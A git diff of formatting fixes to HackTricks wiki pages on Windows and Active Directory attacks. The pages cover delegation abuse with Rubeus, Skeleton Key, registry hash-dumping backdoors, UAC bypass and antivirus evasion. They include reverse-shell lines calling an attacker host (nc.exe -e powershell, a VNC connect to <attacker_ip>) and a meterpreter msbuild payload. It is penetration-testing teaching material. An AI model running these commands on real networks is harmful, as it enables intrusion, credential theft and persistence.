 ### Attack structure
 
-> If you have **write equivalent privileges** over a **Computer **account you can obtain **privileged access **in that machine.
+> If you have **write equivalent privileges** over a **Computer** account you can obtain **privileged access** in that machine.
 
 Suppose that the attacker has already **write equivalent privileges over the victim computer**.
 
-1. The attacker **compromises **an account that has a **SPN **or **creates one **(“Service A”). Note that **any **_Admin User _without any other special privilege can **create **up** **until 10 **Computer objects (**_**MachineAccountQuota**_**) **and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
-2. The attacker configures **resource-based constrained delegation from Service A to the victim host**. 
-3. The attacker uses Rubeus to perform a **full S4U attack** (S4U2Self and S4U2Proxy) from Service A to Service B for a user **with privileged access to Service B**. 
+1. The attacker **compromises** an account that has a **SPN** or **creates one** (“Service A”). Note that **any** _Admin User_ without any other special privilege can **create** up **** until 10 **Computer objects (**_**MachineAccountQuota**_**)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
+2. The attacker configures **resource-based constrained delegation from Service A to the victim host**.&#x20;
+3. The attacker uses Rubeus to perform a **full S4U attack** (S4U2Self and S4U2Proxy) from Service A to Service B for a user **with privileged access to Service B**.&#x20;
    1. S4U2Self (from the SPN compromised/created account): Ask for a **TGS of Administrator to me** (Not Forwardable).
-   2. S4U2Proxy: Use the **not Forwardable TGS** of the step before to ask for a **TGS **from **Administrator **to the **victim host**.
+   2. S4U2Proxy: Use the **not Forwardable TGS** of the step before to ask for a **TGS** from **Administrator** to the **victim host**.
    3. Even if you are using a not Forwardable TGS, as you are exploiting Resource-based constrained delegation, it will work.
-4. The attacker can **pass-the-ticket **and **impersonate **the user to gain **access to the victim**.
+4. The attacker can **pass-the-ticket** and **impersonate** the user to gain **access to the victim**.
 
-To check the _**MachineAccountQuota **_of the domain you can use:
+To check the _**MachineAccountQuota**_ of the domain you can use:
 
 ```
 Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select MachineAccountQuota
@@ -109,8 +109,8 @@ Note that users has an attribute called "**Cannot be delegated**". If a user has
 
 ### Accessing
 
-The last command line will perform the** complete S4U attack and will inject the TGS** from Administrator to the victim host in **memory**.\
-In this example it was requested a TGS for the **CIFS **service from Administrator, so you will be able to access **C$**:
+The last command line will perform the **complete S4U attack and will inject the TGS** from Administrator to the victim host in **memory**.\
+In this example it was requested a TGS for the **CIFS** service from Administrator, so you will be able to access **C$**:
 
 ```bash
 ls \\victim.domain.local\C$
@@ -124,7 +124,7 @@ Lear about the [**available service tickets here**](silver-ticket.md#available-s
 
 ## Kerberos Errors
 
-* **`KDC_ERR_ETYPE_NOTSUPP`**: This means that kerberos is configured to not use DES or RC4 and you are supplying just the RC4 hash. Supply to Rubeus at least the AES256 hash (or just supply it the rc4, aes128 and aes256 hashes). Example:` [Rubeus.Program]::MainString("s4u /user:FAKECOMPUTER /aes256:CC648CF0F809EE1AA25C52E963AC0487E87AC32B1F71ACC5304C73BF566268DA /aes128:5FC3D06ED6E8EA2C9BB9CC301EA37AD4 /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:CIFS/M3DC.M3C.LOCAL /ptt".split())`
+* **`KDC_ERR_ETYPE_NOTSUPP`**: This means that kerberos is configured to not use DES or RC4 and you are supplying just the RC4 hash. Supply to Rubeus at least the AES256 hash (or just supply it the rc4, aes128 and aes256 hashes). Example: `[Rubeus.Program]::MainString("s4u /user:FAKECOMPUTER /aes256:CC648CF0F809EE1AA25C52E963AC0487E87AC32B1F71ACC5304C73BF566268DA /aes128:5FC3D06ED6E8EA2C9BB9CC301EA37AD4 /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:CIFS/M3DC.M3C.LOCAL /ptt".split())`
 * **`KRB_AP_ERR_SKEW`**: This means that the time of the current computer is different from the one of the DC and kerberos is not working properly.
 * **`preauth_failed`**: This means that the given  username + hashes aren't working to login. You may have forgotten to put the "$" inside the username when generating the hashes (`.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local`)
 * **`KDC_ERR_BADOPTION`**: This may mean:
diff --git a/windows/active-directory-methodology/security-descriptors.md b/windows/active-directory-methodology/security-descriptors.md
index d73376ac..9ab69795 100644
--- a/windows/active-directory-methodology/security-descriptors.md
+++ b/windows/active-directory-methodology/security-descriptors.md
@@ -4,25 +4,25 @@
 
 Security Descriptor Definition Language (SDDL) defines the format which is used to describe a security descriptor. SDDL uses ACE strings for DACL and SACL:: `ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;`
 
-The **security descriptors **are used to **store **the **permissions **an **object **has **over **an **object**. If you can just **make **a **little change **in the **security descriptor **of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.
+The **security descriptors** are used to **store** the **permissions** an **object** has **over** an **object**. If you can just **make** a **little change** in the **security descriptor** of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.
 
 Then, this persistence technique is based on the hability to win every privilege needed against certain objects, to be able to perform a task that usually requires admin privileges but without the need of being admin.
 
-You can give a user access to **execute remotely WMI **[**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1):
+You can give a user access to **execute remotely WMI** [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1):
 
 ```bash
 Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
 Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
 ```
 
-Give access to** winrm PS console to a user **[**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**:**
+Give access to **winrm PS console to a user** [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**:**
 
 ```bash
 Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
 Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
 ```
 
-Access the **registry **and **dump hashes** creating a **Reg backdoor using **[**DAMP**](https://github.com/HarmJ0y/DAMP)**, **so you can at any moment retrieve the **hash of the computer**, the **SAM **and any **cached AD** credential in the computer. So, it's very useful to give this permission to a **regular user against a Domain Controller computer**:
+Access the **registry** and **dump hashes** creating a **Reg backdoor using** [**DAMP**](https://github.com/HarmJ0y/DAMP)**,** so you can at any moment retrieve the **hash of the computer**, the **SAM** and any **cached AD** credential in the computer. So, it's very useful to give this permission to a **regular user against a Domain Controller computer**:
 
 ```bash
 Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
diff --git a/windows/active-directory-methodology/skeleton-key.md b/windows/active-directory-methodology/skeleton-key.md
index 8dd9d740..372c86d7 100644
--- a/windows/active-directory-methodology/skeleton-key.md
+++ b/windows/active-directory-methodology/skeleton-key.md
@@ -2,15 +2,15 @@
 
 ## **Skeleton Key**
 
-**From: **[**https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/**](https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/)****
+**From:** [**https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/**](https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/)****
 
-There are several methods for compromising Active Directory accounts that attackers can use to elevate privileges and create persistence once they have established themselves in your domain. The Skeleton Key is a particularly scary piece of malware targeted at Active Directory domains to make it alarmingly easy to hijack any account. This malware** injects itself into LSASS and creates a master password that will work for any account in the domain**. Existing passwords will also continue to work, so it is very difficult to know this attack has taken place unless you know what to look for.
+There are several methods for compromising Active Directory accounts that attackers can use to elevate privileges and create persistence once they have established themselves in your domain. The Skeleton Key is a particularly scary piece of malware targeted at Active Directory domains to make it alarmingly easy to hijack any account. This malware **injects itself into LSASS and creates a master password that will work for any account in the domain**. Existing passwords will also continue to work, so it is very difficult to know this attack has taken place unless you know what to look for.
 
 Not surprisingly, this is one of the many attacks that is packaged and very easy to perform using [Mimikatz](https://github.com/gentilkiwi/mimikatz). Let’s take a look at how it works.
 
 #### Requirements for the Skeleton Key Attack
 
-In order to perpetrate this attack,** the attacker must have Domain Admin rights**. This attack must be **performed on each and every domain controller for complete compromise, but even targeting a single domain controller can be effective**. **Rebooting **a domain controller **will remove this malware** and it will have to be redeployed by the attacker.
+In order to perpetrate this attack, **the attacker must have Domain Admin rights**. This attack must be **performed on each and every domain controller for complete compromise, but even targeting a single domain controller can be effective**. **Rebooting** a domain controller **will remove this malware** and it will have to be redeployed by the attacker.
 
 #### Performing the Skeleton Key Attack
 
@@ -18,15 +18,15 @@ Performing the attack is very straightforward to do. It only requires the follow
 
 ![Injecting a skeleton key using the misc::skeleton into a domain controller with Mimikatz](https://blog.stealthbits.com/wp-content/uploads/2017/07/1-3.png)
 
-Here is an authentication for a Domain Admin member using the skeleton key as a password to get administrative access to a domain controller: 
+Here is an authentication for a Domain Admin member using the skeleton key as a password to get administrative access to a domain controller:&#x20;
 
 ![Using the skeleton key as a password with the misc::skeleton command to get administrative access to a domain controller with the default password of Mimikatz](https://blog.stealthbits.com/wp-content/uploads/2017/07/2-5.png)
 
-Note: If you do get a message saying, “System error 86 has occurred. The specified network password is not correct”, just try using the domain\account format for the username and it should work. 
+Note: If you do get a message saying, “System error 86 has occurred. The specified network password is not correct”, just try using the domain\account format for the username and it should work.&#x20;
 
 ![Using the domain\account format for the username if you get a message saying System error 86 has occurred The specified network password is not correct](https://blog.stealthbits.com/wp-content/uploads/2017/07/3-3.png)
 
-If lsass was **already patched** with skeleton, then this **error **will appear:
+If lsass was **already patched** with skeleton, then this **error** will appear:
 
 ![](<../../.gitbook/assets/image (160).png>)
 
diff --git a/windows/active-directory-methodology/unconstrained-delegation.md b/windows/active-directory-methodology/unconstrained-delegation.md
index 4e374dc8..cc5a053d 100644
--- a/windows/active-directory-methodology/unconstrained-delegation.md
+++ b/windows/active-directory-methodology/unconstrained-delegation.md
@@ -2,11 +2,11 @@
 
 ## Unconstrained delegation
 
-This a feature that a Domain Administrator can set to any **Computer **inside the domain. Then, anytime a **user logins** onto the Computer, a **copy of the TGT** of that user is going to be **sent inside the TGS** provided by the DC **and saved in memory in LSASS**. So, if you have Administrator privileges on the machine, you will be able to** dump the tickets and impersonate the users** on any machine.
+This a feature that a Domain Administrator can set to any **Computer** inside the domain. Then, anytime a **user logins** onto the Computer, a **copy of the TGT** of that user is going to be **sent inside the TGS** provided by the DC **and saved in memory in LSASS**. So, if you have Administrator privileges on the machine, you will be able to **dump the tickets and impersonate the users** on any machine.
 
 So if a domain admin logins inside a Computer with "Unconstrained Delegation" feature activated, and you have local admin privileges inside that machine, you will be able to dump the ticket and impersonate the Domain Admin anywhere (domain privesc).
 
- You can **find Computer objects with this attribute** checking if the [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) attribute contains [ADS_UF_TRUSTED_FOR_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx). You can do this with an LDAP filter of ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, which is what powerview does:
+&#x20;You can **find Computer objects with this attribute** checking if the [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) attribute contains [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx). You can do this with an LDAP filter of ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, which is what powerview does:
 
 ```bash
 Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
@@ -16,13 +16,13 @@ sekurlsa::tickets /export #Recommended way
 kerberos::list /export #Another way
 ```
 
-Load the ticket of Administrator (or victim user) in memory with **Mimikatz **or **Rubeus for a **[**Pass the Ticket**](pass-the-ticket.md)**.**\
+Load the ticket of Administrator (or victim user) in memory with **Mimikatz** or **Rubeus for a** [**Pass the Ticket**](pass-the-ticket.md)**.**\
 More info: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
 [**More information about Unconstrained delegation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)****
 
 ### **Automatically compromising a Print server**
 
-If an attacker is able to** compromise a computer allowed for "Unconstrained Delegation"**, he could **trick **a **Print server **to **automatically login **against it** saving a TGT** in the memory of the server.\
+If an attacker is able to **compromise a computer allowed for "Unconstrained Delegation"**, he could **trick** a **Print server** to **automatically login** against it **saving a TGT** in the memory of the server.\
 Then, the attacker could perform a **Pass the Ticket attack to impersonate** the user Print server computer account.
 
 To make a print server login against any machine you can use [**SpoolSample**](https://github.com/leechristensen/SpoolSample):
@@ -31,7 +31,7 @@ To make a print server login against any machine you can use [**SpoolSample**](h
 .\SpoolSample.exe printmachine unconstrinedmachine
 ```
 
-If the TGT if from a domain controller, you could perform a[** DCSync attack**](acl-persistence-abuse.md#dcsync) and obtain all the hashes from the DC.\
+If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse.md#dcsync) and obtain all the hashes from the DC.\
 [**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)****
 
 ### Mitigation
diff --git a/windows/authentication-credentials-uac-and-efs.md b/windows/authentication-credentials-uac-and-efs.md
index bd33a067..6a1d9ab2 100644
--- a/windows/authentication-credentials-uac-and-efs.md
+++ b/windows/authentication-credentials-uac-and-efs.md
@@ -8,26 +8,26 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha
 
 ### Main SSPs
 
-* **Kerberos**: The preferred one 
+* **Kerberos**: The preferred one&#x20;
   * %windir%\Windows\System32\kerberos.dll
-* **NTLMv1 **and **NTLMv2**: Compatibility reasons 
+* **NTLMv1** and **NTLMv2**: Compatibility reasons&#x20;
   * %windir%\Windows\System32\msv1\_0.dll
-* **Digest**: Web servers and LDAP, password in form of a MD5 hash 
+* **Digest**: Web servers and LDAP, password in form of a MD5 hash&#x20;
   * %windir%\Windows\System32\Wdigest.dll
-* **Schannel**: SSL and TLS 
+* **Schannel**: SSL and TLS&#x20;
   * %windir%\Windows\System32\Schannel.dll
-* **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one) 
-  *  %windir%\Windows\System32\lsasrv.dll
+* **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one)&#x20;
+  * &#x20;%windir%\Windows\System32\lsasrv.dll
 
 #### The negotiation could offer several methods or only one.
 
 ## Local Security Authority (LSA)
 
-The **credentials **(hashed) are **saved **in the **memory **of this subsystem for Single Sign-On reasons.\
-**LSA **administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\
-LSA will be the one that will **check **for provided credentials inside the **SAM **file (for a local login) and **talk **with the **domain controller **to authenticate a domain user.
+The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\
+**LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\
+LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user.
 
-The **credentials **are **saved **inside the **process **_**LSASS**_: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
+The **credentials** are **saved** inside the **process **_**LSASS**_: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
 
 ## Credentials Storage
 
@@ -58,19 +58,19 @@ Allows browsers and other Windows applications to save credentials.
 
 ## UAC
 
-UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default **the **low privileged token **of the user. When, the administrator executes some process** as administrator**, a **UAC elevation **is performed and if it is successfully completed, the privileged token is used to create the process.
+UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user. When, the administrator executes some process **as administrator**, a **UAC elevation** is performed and if it is successfully completed, the privileged token is used to create the process.
 
-To **differentiate** which process is executed with **low **or **high privileges** **Mandatory Integrity Controls** (MIC) are used. If you still don't know what are Windows Integrity levels check the following page:
+To **differentiate** which process is executed with **low** or **high privileges** **Mandatory Integrity Controls** (MIC) are used. If you still don't know what are Windows Integrity levels check the following page:
 
 {% content-ref url="windows-local-privilege-escalation/integrity-levels.md" %}
 [integrity-levels.md](windows-local-privilege-escalation/integrity-levels.md)
 {% endcontent-ref %}
 
-Some programs are **autoelevated automatically **if the **user belongs **to the **administrator group**. These binaries have inside their _**Manifests **_the _**autoElevate **_option with value _**True**_. The binary has to be **signed by Microsoft **also.
+Some programs are **autoelevated automatically** if the **user belongs** to the **administrator group**. These binaries have inside their _**Manifests**_ the _**autoElevate**_ option with value _**True**_. The binary has to be **signed by Microsoft** also.
 
-Then, to **bypass **the **UAC **(elevate from **medium **integrity level **to high**) some attackers use this kind of binaries to **execute arbitrary code** because it will be executed from a **High level integrity process**.
+Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to high**) some attackers use this kind of binaries to **execute arbitrary code** because it will be executed from a **High level integrity process**.
 
-You can **check **the _**Manifest **_of a binary using the tool_** sigcheck.exe**_ from Sysinternals. And you can **see **the **integrity level **of the processes using _Process Explorer_ or _Process Monitor_ (of Sysinternals).
+You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe**_ from Sysinternals. And you can **see** the **integrity level** of the processes using _Process Explorer_ or _Process Monitor_ (of Sysinternals).
 
 ### Check UAC
 
@@ -80,7 +80,7 @@ First you need to check the value of the key **EnableLUA**, if it's **`1`** then
  reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ 
 ```
 
-Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`**in the same entry of the registry as before (info from [here](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)):
+Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`**in the same entry of the registry as before (info from [here](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)):
 
 * If **`0`** then, UAC won't prompt (like **disabled**)
 * If **`1`** the admin is **asked for username and password** to execute the binary with high rights (on Secure Desktop)
@@ -98,9 +98,9 @@ If **`0`**(default), the **built-in Administrator account can** do remote admini
 #### Summary
 
 * If **`EnableLUA=0`**or **doesn't exist**, **no UAC for anyone**
-* If** `EnableLua=1` **and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
-* If** `EnableLua=1` **and **`LocalAccountTokenFilterPolicy=0` **and** `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
-* If** `EnableLua=1` **and **`LocalAccountTokenFilterPolicy=0` **and** `FilterAdministratorToken=1`, UAC for everyone**
+* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
+* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=0` ** and ** `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
+* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=0` ** and ** `FilterAdministratorToken=1`, UAC for everyone**
 
 ### UAC bypass
 
@@ -110,7 +110,7 @@ Note that if you have graphical access to the victim, UAC bypass is straight for
 
 It is important to mention that it is **much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).**
 
-The UAC bypass is needed in the following situation:** the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**.\
+The UAC bypass is needed in the following situation: **the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**.\
 All this information can be gathered using the metasploit module: `post/windows/gather/win_privs`
 
 You can also check the groups of your user and get the integrity level:
@@ -120,7 +120,7 @@ net user %username%
 whoami /groups | findstr Level
 ```
 
-#### **Very **Basic UAC "bypass" (full file system access)
+#### **Very** Basic UAC "bypass" (full file system access)
 
 If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB (file system) local in a new disk and you will have **access to everything inside the file system** (even Administrator home folder).
 
@@ -148,16 +148,16 @@ Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10
 
 #### UAC bypass exploits
 
-You could also use some tools to** bypass UAC like **[**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation **of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like_Source\Akagi\outout\x64\Debug\Akagi.exe_) , you will need to know **which one you need.**\
-****You should **be careful** because some bypasses will **prompt some other programs** that will **alert **the **user **that something is happening.
+You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like_Source\Akagi\outout\x64\Debug\Akagi.exe_) , you will need to know **which one you need.**\
+****You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening.
 
-**Empire **and **Metasploit **also have several modules to **bypass **the **UAC**. 
+**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.&#x20;
 
 #### More UAC bypass
 
-**All **the techniques used here to bypass AUC **require **a **full interactive shell **with the victim (a common nc.exe shell is not enough).
+**All** the techniques used here to bypass AUC **require** a **full interactive shell** with the victim (a common nc.exe shell is not enough).
 
-You can get using a **meterpreter **session. Migrate to a **process **that has the **Session **value equals to** 1**:
+You can get using a **meterpreter** session. Migrate to a **process** that has the **Session** value equals to **1**:
 
 ![](<../.gitbook/assets/image (96).png>)
 
@@ -167,40 +167,40 @@ You can get using a **meterpreter **session. Migrate to a **process **that has t
 
 If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](windows-local-privilege-escalation/dll-hijacking.md).
 
-1. Find a binary that will **autoelevate **(check that when it is executed it runs in a high integrity level).
+1. Find a binary that will **autoelevate** (check that when it is executed it runs in a high integrity level).
 2. With procmon find "**NAME NOT FOUND**" events that can be vulnerable to **DLL Hijacking**.
-3. You probably will need to **write **the DLL inside some **protected paths** (like C:\Windows\System32) were you don't have writing permissions. You can bypass this using:
+3. You probably will need to **write** the DLL inside some **protected paths** (like C:\Windows\System32) were you don't have writing permissions. You can bypass this using:
    1. **wusa.exe**: Windows 7,8 and 8.1. It allows to extract the content of a CAB file inside protected paths (because this tool is executed from a high integrity level).
    2. **IFileOperation**: Windows 10.
-4. Prepare a **script **to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
+4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
 
 #### Another UAC bypass technique
 
-Consists on watching if an **autoElevated binary** tries to **read **from the **registry **the **name/path** of a **binary **or **command **to be **executed **(this is more interesting if the binary searches this information inside the **HKCU**).
+Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
 
 ## EFS (Encrypted File System)
 
-EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**.  The FEK is then **encrypted **with a **public key **that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream **of the encrypted file. To decrypt the file, the EFS component driver uses the **private key **that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting_File_System).
+EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**.  The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System).
 
-Examples of files being decrypted without the user asking for it: 
+Examples of files being decrypted without the user asking for it:&#x20;
 
-* Files and folders are decrypted before being copied to a volume formatted with another file system, like [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table). 
+* Files and folders are decrypted before being copied to a volume formatted with another file system, like [FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table).&#x20;
 * Encrypted files are copied over the network using the SMB/CIFS protocol, the files are decrypted before they are sent over the network.
 
-The encrypted files using this method can be** tansparently access by the owner user** (the one who has encrypted them), so if you can **become that user** you can decrypt the files (changing the password of the user and logins as him won't work).
+The encrypted files using this method can be **tansparently access by the owner user** (the one who has encrypted them), so if you can **become that user** you can decrypt the files (changing the password of the user and logins as him won't work).
 
 ### Check EFS info
 
-Check if a **user **has **used **this **service **checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
+Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
 
-Check **who **has **access **to the file using cipher /c \<file>\
-You can also use `cipher /e` and` cipher /d` inside a folder to **encrypt **and **decrypt **all the files
+Check **who** has **access** to the file using cipher /c \<file>\
+You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files
 
-### Decrypting EFS files 
+### Decrypting EFS files&#x20;
 
 #### Being Authority System
 
-This way requires the **victim user **to be **running **a **process **inside the host. If that is the case, using a `meterpreter `sessions you can impersonate the token of the process of the user (`impersonate_token `from `incognito`). Or you could just `migrate `to process of the user.
+This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user (`impersonate_token` from `incognito`). Or you could just `migrate` to process of the user.
 
 #### Knowing the users password
 
diff --git a/windows/av-bypass.md b/windows/av-bypass.md
index ded27dcb..d97a5537 100644
--- a/windows/av-bypass.md
+++ b/windows/av-bypass.md
@@ -2,13 +2,13 @@
 
 ## **Telnet Server**
 
-Until Windows10, all Windows came with a **Telnet server **that you could install (as administrator) doing:
+Until Windows10, all Windows came with a **Telnet server** that you could install (as administrator) doing:
 
 ```
 pkgmgr /iu:"TelnetServer" /quiet
 ```
 
-Make it **start **when the system is started and **run **it now:
+Make it **start** when the system is started and **run** it now:
 
 ```
 sc config TlntSVR start= auto obj= localsystem
@@ -28,14 +28,14 @@ Download it from: [http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.
 **Execute **_**winvnc.exe**_ and configure the server:
 
 * Enable the option _Disable TrayIcon_
-* Set a password in_ VNC Password_
+* Set a password in _VNC Password_
 * Set a password in _View-Only Password_
 
-Then, move the binary _**winvnc.exe**_ and **newly **created file _**UltraVNC.ini**_ inside the **victim**
+Then, move the binary _**winvnc.exe**_ and **newly** created file _**UltraVNC.ini**_ inside the **victim**
 
 ### **Reverse connection**
 
-The **attacker **should **execute inside **his **host **the binary `vncviewer.exe -listen 5900` so it will be **prepared **to catch a reverse **VNC connection**.\
+The **attacker** should **execute inside** his **host** the binary `vncviewer.exe -listen 5900` so it will be **prepared** to catch a reverse **VNC connection**.\
 Then, it should execute inside the **victim**: `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`
 
 ## GreatSCT
@@ -62,7 +62,7 @@ generate #payload is the default name
 #This will generate a meterpreter xml and a rcc file for msfconsole
 ```
 
-Now **start the lister** with` msfconsole -r file.rc` and **execute **the **xml payload **with:
+Now **start the lister** with `msfconsole -r file.rc` and **execute** the **xml payload** with:
 
 ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
@@ -72,7 +72,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
 
 ## Compiling our own reverse shell
 
- https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
+&#x20;https://medium.com/@Bank\_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
 
 #### First C# Revershell
 
@@ -160,7 +160,7 @@ namespace ConnectBack
 }
 ```
 
-[https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs](https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs)
+[https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple\_Rev\_Shell.cs](https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple\_Rev\_Shell.cs)
 
 ## C# using compiler
 
diff --git a/windows/checklist-windows-privilege-escalation.md b/windows/checklist-windows-privilege-escalation.md
index f6cc3a85..c55433cb 100644
--- a/windows/checklist-windows-privilege-escalation.md
+++ b/windows/checklist-windows-privilege-escalation.md
@@ -2,18 +2,18 @@
 
 {% hint style="danger" %}
 Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\
-[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop)** so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
+[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
 {% endhint %}
 
